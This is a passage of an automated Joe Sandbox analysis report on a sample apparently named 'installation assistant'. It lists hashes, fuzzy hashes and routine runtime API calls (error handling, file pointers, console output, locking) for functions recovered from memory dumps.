                                    • API String ID: 3332196525-1866435925
                                    • Opcode ID: c4e335b18c07bbb31d31e6bb72535bf2f0ac2bd7203721199aa83c55ee3d8f86
                                    • Instruction ID: 586c4024c1f8dc90e8ac96e6d0cbe0e70f73480210fe4f4ea7e93ebedbc04967
                                    • Opcode Fuzzy Hash: c4e335b18c07bbb31d31e6bb72535bf2f0ac2bd7203721199aa83c55ee3d8f86
                                    • Instruction Fuzzy Hash: 6241B2B0A0031A9FDB00CF64C8457AEBBF0FF49318F149268E919AB791D775A985CBD0
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: H_prolog
                                    • String ID: $CK$CK
                                    • API String ID: 3519838083-2957773085
                                    • Opcode ID: 2704db3354b84918023bfe159d178872147a663a780c49e5ab543107787eea7d
                                    • Instruction ID: bc03c80c8da9eecf494504070aa4b9812f67d9c5822d8752e336a70cb2435e63
                                    • Opcode Fuzzy Hash: 2704db3354b84918023bfe159d178872147a663a780c49e5ab543107787eea7d
                                    • Instruction Fuzzy Hash: BE219274E016098BDB08DFE9C4902EEF7B6FFA4304F54466AC516F3B91C7745A068E61
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: H_prolog
                                    • String ID: 0$LrJ$x
                                    • API String ID: 3519838083-658305261
                                    • Opcode ID: 4d1a12b996d8cdd79ba2c3eb3f59f6bf691634cc710ec0f5f651f2212a36eb1c
                                    • Instruction ID: 3b500785272295773945452296dccb62d872efc933d97a0e9ecdee1c1d809604
                                    • Opcode Fuzzy Hash: 4d1a12b996d8cdd79ba2c3eb3f59f6bf691634cc710ec0f5f651f2212a36eb1c
                                    • Instruction Fuzzy Hash: F0213B36D421199FCF04DBD8C9A0BEDB7B5EFA9308F20005AE41577640DB795E49CBA2
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 6C1C4ECC
                                      • Part of subcall function 6C1AF58A: __EH_prolog.LIBCMT ref: 6C1AF58F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: H_prolog
                                    • String ID: :hJ$dJ$xJ
                                    • API String ID: 3519838083-2437443688
                                    • Opcode ID: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                                    • Instruction ID: 59ae7b2131fc9c6f3f115e5c4c030e884094e3184c783941ab82bb8c00efdfdf
                                    • Opcode Fuzzy Hash: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                                    • Instruction Fuzzy Hash: 0D21D8B0801B50CFC760DF6AC14429ABBF4BF2A708B00C95EC0AA97B11D7B8A608CF55
                                    APIs
                                    • SetFilePointerEx.KERNEL32(00000000,?,00000000,6C17B0D0,6C031DEA,00008000,6C17B0D0,?,?,?,6C17AC7F,6C17B0D0,?,00000000,6C031DEA), ref: 6C17ADC9
                                    • GetLastError.KERNEL32(?,?,?,6C17AC7F,6C17B0D0,?,00000000,6C031DEA,?,6C18469E,6C17B0D0,000000FF,000000FF,00000002,00008000,6C17B0D0), ref: 6C17ADD3
                                    • __dosmaperr.LIBCMT ref: 6C17ADDA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: ErrorFileLastPointer__dosmaperr
                                    • String ID: 8Q
                                    • API String ID: 2336955059-4022487301
                                    • Opcode ID: 23359a250ec1d28d2ba24b95c8fce2ce5d87a6b75c32919de9464b2b5b9f822d
                                    • Instruction ID: 5793322fcbc905db012fba7f23085146b750b2326e4c085138d0442a877c7d16
                                    • Opcode Fuzzy Hash: 23359a250ec1d28d2ba24b95c8fce2ce5d87a6b75c32919de9464b2b5b9f822d
                                    • Instruction Fuzzy Hash: 2301D433714515AFCF158F6ACC05A9E3B29EB86325B350208F8229B680EA71DD118BA0
                                    APIs
                                    • AcquireSRWLockExclusive.KERNEL32(6C26466C,?,652EF5AA,6C03230E,6C26430C), ref: 6C166B07
                                    • ReleaseSRWLockExclusive.KERNEL32(6C26466C), ref: 6C166B3A
                                    • WakeAllConditionVariable.KERNEL32(6C264668), ref: 6C166B45
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: ExclusiveLock$AcquireConditionReleaseVariableWake
                                    • String ID: lF&l
                                    • API String ID: 1466638765-2742667394
                                    • Opcode ID: c347391972ac8fcce3dd535381ad80a4f69f8ba2bd7dea6cf094ead048dc6ecc
                                    • Instruction ID: 7a37e3e6b4a2481280797605af3c7af01cadc9f9688dce14e7489ae885daac1c
                                    • Opcode Fuzzy Hash: c347391972ac8fcce3dd535381ad80a4f69f8ba2bd7dea6cf094ead048dc6ecc
                                    • Instruction Fuzzy Hash: 1AF039B8A01504DFCB05EF5AE858DA4BBB8FB4B351B01806AFD0687740CB70A801CFB5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: <J$DJ$HJ$TJ$]
                                    • API String ID: 0-686860805
                                    • Opcode ID: b82db92acc6f2fd2fd2fd5332bfa7d1e38ecda44958a76cbd211a3f1299ff4ed
                                    • Instruction ID: 0c563af479b35e2e247e90744de1733dd8a98198d32f909d92def410a44ccbb0
                                    • Opcode Fuzzy Hash: b82db92acc6f2fd2fd2fd5332bfa7d1e38ecda44958a76cbd211a3f1299ff4ed
                                    • Instruction Fuzzy Hash: 1D416071C05289AFDF14DBA1D4D0AEEB770AF21308B608169E16277E60EB39A64DCF11
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: __aulldiv
                                    • String ID:
                                    • API String ID: 3732870572-0
                                    • Opcode ID: 2bdaa92217569021002d8658a142890db49ae38c047720c0e1f220da2750cc6e
                                    • Instruction ID: 472497a8a7d810291be021ff8e45c55b01e37c182b97f9644b64c0ea44dc3db9
                                    • Opcode Fuzzy Hash: 2bdaa92217569021002d8658a142890db49ae38c047720c0e1f220da2750cc6e
                                    • Instruction Fuzzy Hash: AA1193B620020CBFEB254BA4CD44EAF7BBDEFD5B44F10841DF54566A60CA71AC149B20
                                    APIs
                                    • GetLastError.KERNEL32(00000008,?,00000000,6C178453), ref: 6C1749B7
                                    • _free.LIBCMT ref: 6C174A14
                                    • _free.LIBCMT ref: 6C174A4A
                                    • SetLastError.KERNEL32(00000000,00000008,000000FF), ref: 6C174A55
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: ErrorLast_free
                                    • String ID:
                                    • API String ID: 2283115069-0
                                    • Opcode ID: ebec04221c71c1aa3dc293c4ff961ef8d792d63da997ad3ccf1a8ea2ecc03bbd
                                    • Instruction ID: 5ad97820227f7073c0e708f302a9be9cde1648efbe9ad3784d369b8190c00a88
                                    • Opcode Fuzzy Hash: ebec04221c71c1aa3dc293c4ff961ef8d792d63da997ad3ccf1a8ea2ecc03bbd
                                    • Instruction Fuzzy Hash: 2811A7323051046BDE3159B94C88E6A2269ABC737CB360625F53593BC0DF718C098D78
                                    APIs
                                    • WriteConsoleW.KERNEL32(00000000,?,6C1846EC,00000000,00000000,?,6C184B51,00000000,00000001,00000000,6C17B0D0,?,6C17C286,?,?,6C17B0D0), ref: 6C185ED1
                                    • GetLastError.KERNEL32(?,6C184B51,00000000,00000001,00000000,6C17B0D0,?,6C17C286,?,?,6C17B0D0,?,6C17B0D0,?,6C17BD1C,6C185AB6), ref: 6C185EDD
                                      • Part of subcall function 6C185F2E: CloseHandle.KERNEL32(FFFFFFFE,6C185EED,?,6C184B51,00000000,00000001,00000000,6C17B0D0,?,6C17C286,?,?,6C17B0D0,?,6C17B0D0), ref: 6C185F3E
                                    • ___initconout.LIBCMT ref: 6C185EED
                                      • Part of subcall function 6C185F0F: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6C185EAB,6C184B3E,6C17B0D0,?,6C17C286,?,?,6C17B0D0,?), ref: 6C185F22
                                    • WriteConsoleW.KERNEL32(00000000,?,6C1846EC,00000000,?,6C184B51,00000000,00000001,00000000,6C17B0D0,?,6C17C286,?,?,6C17B0D0,?), ref: 6C185F02
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                    • String ID:
                                    • API String ID: 2744216297-0
                                    • Opcode ID: 8fa5df59938979cd15ad00042b7dac132fbc6fe04176bc0e2639abc78ff802ce
                                    • Instruction ID: 495fdb7eb5bf5a88be830aa6a99650d18956b369c4ffbfcd24cf2ac101a282b8
                                    • Opcode Fuzzy Hash: 8fa5df59938979cd15ad00042b7dac132fbc6fe04176bc0e2639abc78ff802ce
                                    • Instruction Fuzzy Hash: 84F0C737505115BBDF121FA6DC089993F76FF067A5B044550FE1995560CB328820EFD0
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 6C19E077
                                      • Part of subcall function 6C19DFF5: __EH_prolog.LIBCMT ref: 6C19DFFA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: H_prolog
                                    • String ID: :$\
                                    • API String ID: 3519838083-1166558509
                                    • Opcode ID: 48f4411e2405fcdde49591215dd3ffd545f97566ccde13c94e17e7da02f2e48f
                                    • Instruction ID: de96cea3729257fae589ea13856b47688738d5c2d7316ff0c66abf6349956a2c
                                    • Opcode Fuzzy Hash: 48f4411e2405fcdde49591215dd3ffd545f97566ccde13c94e17e7da02f2e48f
                                    • Instruction Fuzzy Hash: 28E1B030900209DADF11DFA8C890BEDB7B1BF2631CF14811DE85667B90EB75A749CB92
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: H_prolog__aullrem
                                    • String ID: d%K
                                    • API String ID: 3415659256-3110269457
                                    • Opcode ID: edd8db3a4067630c511c1f9d0118cc4b792e07b2613ebc31a4b030f5161dda76
                                    • Instruction ID: d676a29c0d4bf33280229a0744371dc128929f53f036c934e8ec4f9b9b2f0304
                                    • Opcode Fuzzy Hash: edd8db3a4067630c511c1f9d0118cc4b792e07b2613ebc31a4b030f5161dda76
                                    • Instruction Fuzzy Hash: BB81C272A00A09DFDF00CF54C894BDEBBF5AF59348F248059E859EB641D775D909CBA0
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: H_prolog3_
                                    • String ID: 8Q
                                    • API String ID: 2427045233-4022487301
                                    • Opcode ID: a2f36ffef26a892b41aec89094db427f8523cbcc1724647af4eca194f0cbb431
                                    • Instruction ID: 5a610d3a32238c5c4327425290c76244b4659e385c06321d6a3475ab47fe299d
                                    • Opcode Fuzzy Hash: a2f36ffef26a892b41aec89094db427f8523cbcc1724647af4eca194f0cbb431
                                    • Instruction Fuzzy Hash: 4B71A371D052169FDB318F96C880BEE7BB5AF55318FA48229E82067E80DF758947CB70
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: H_prolog
                                    • String ID: @$hfJ
                                    • API String ID: 3519838083-1391159562
                                    • Opcode ID: 82ac28e14911e15d6061b9e8fa7e1011da5464f288955fede779c14a83bf3726
                                    • Instruction ID: 26bd7958640c9ab049f95ca5846f071d5725ead9e49da328457a2724fc45d360
                                    • Opcode Fuzzy Hash: 82ac28e14911e15d6061b9e8fa7e1011da5464f288955fede779c14a83bf3726
                                    • Instruction Fuzzy Hash: 1B913C70A10248DFCB10DFA9C884ADEFBF4BF28308F94451EF556A7A50D774AA49CB11
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 6C1B8C5D
                                      • Part of subcall function 6C1B761A: __EH_prolog.LIBCMT ref: 6C1B761F
                                      • Part of subcall function 6C1B7A2E: __EH_prolog.LIBCMT ref: 6C1B7A33
                                      • Part of subcall function 6C1B8EA5: __EH_prolog.LIBCMT ref: 6C1B8EAA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: H_prolog
                                    • String ID: WZJ
                                    • API String ID: 3519838083-1089469559
                                    • Opcode ID: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                                    • Instruction ID: 58621775bd4814ea87e4634ec037c62bf2dc7a6f0e370636502f09280c3a89be
                                    • Opcode Fuzzy Hash: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                                    • Instruction Fuzzy Hash: 67817835D00159DFDB15DFA8D890BDDB7B4AF19318F20409AE416B7BA0DB34AA09CF61
                                    APIs
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 6C032A76
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: ___std_exception_destroy
                                    • String ID: Jbx$Jbx
                                    • API String ID: 4194217158-1161259238
                                    • Opcode ID: 24a26f3acb059ed46236c297f13bed71a707aa1cf5e267029520b58a199fd243
                                    • Instruction ID: be477f2d7df27737c0b7dea63d6dbfe30276acf60d1bfd3145e4abe683e26f4b
                                    • Opcode Fuzzy Hash: 24a26f3acb059ed46236c297f13bed71a707aa1cf5e267029520b58a199fd243
                                    • Instruction Fuzzy Hash: BA5123B19002059FCB10CF69C884B9EBBF5EF89314F10846EE8499BB42D335E995CBD2
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: H_prolog
                                    • String ID: <dJ$Q
                                    • API String ID: 3519838083-2252229148
                                    • Opcode ID: 8611fd72bf4170e71673488c417c1a53bfaf30d487d7fd955d74d6e9e56554ac
                                    • Instruction ID: 6e7d3c573a714ac3828457796d3b7376f57185af7839fbc0933fd44570f61c0b
                                    • Opcode Fuzzy Hash: 8611fd72bf4170e71673488c417c1a53bfaf30d487d7fd955d74d6e9e56554ac
                                    • Instruction Fuzzy Hash: C15181B1A04249EFCF00DFD8C8909EDB7B1BF55358F10851EF516AB650D7399A49CB12
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: H_prolog
                                    • String ID: $D^J
                                    • API String ID: 3519838083-3977321784
                                    • Opcode ID: 592ff2149492c1b5d1f5267e2a791cd36de2b3efa6476b1a9cfe308cba17f1e8
                                    • Instruction ID: 7fa6eafd48ec98e58d1a172c51b396cca949ad7c70f8c3ef18948e628ce94633
                                    • Opcode Fuzzy Hash: 592ff2149492c1b5d1f5267e2a791cd36de2b3efa6476b1a9cfe308cba17f1e8
                                    • Instruction Fuzzy Hash: B1416B60E045906ED722DF3AC4D0BECBBA29F26308F188158C49667FC5DBB4598BCF90
                                    APIs
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,6C1846D6), ref: 6C17D01B
                                    • __dosmaperr.LIBCMT ref: 6C17D022
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: ErrorLast__dosmaperr
                                    • String ID: 8Q
                                    • API String ID: 1659562826-4022487301
                                    • Opcode ID: c14c5f33b27b218701a954a94ab3e730b0b3dcb615ce56c251c7be87f0cb26f8
                                    • Instruction ID: d2e7cb2f7036843b40a7286fe23a6f3889cd11b643f51f5aa18065dca350ec2d
                                    • Opcode Fuzzy Hash: c14c5f33b27b218701a954a94ab3e730b0b3dcb615ce56c251c7be87f0cb26f8
                                    • Instruction Fuzzy Hash: A341A931604198AFD731AF2DC8A0BA97FE0EF46304F248299E8808B642D3719D12C7B0
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: H_prolog
                                    • String ID: X&L$p|J
                                    • API String ID: 3519838083-2944591232
                                    • Opcode ID: 9119c1f64bb26ad996fbea7536e901d29dd4483baa18a121855aa129662547ca
                                    • Instruction ID: e24a43578ee59fe1c27bf943390f89f3c5c4b6d304d3ffaf0216c4e82156f2e4
                                    • Opcode Fuzzy Hash: 9119c1f64bb26ad996fbea7536e901d29dd4483baa18a121855aa129662547ca
                                    • Instruction Fuzzy Hash: 76313EB5A95105CBD7109B5CDD01FEE7771EB32728F130226D512A6EE0CB60B589CA51
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: H_prolog
                                    • String ID: 0|J$`)L
                                    • API String ID: 3519838083-117937767
                                    • Opcode ID: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                                    • Instruction ID: a3dd5dce47430b4d52f6d5ea962c68b9b60fddad2412c9d6ab785174cd100ba0
                                    • Opcode Fuzzy Hash: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                                    • Instruction Fuzzy Hash: 37419071605B85EFDB118F64C4A0BEABBE2FF55208F01442EE45A97750CB357909CB92
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
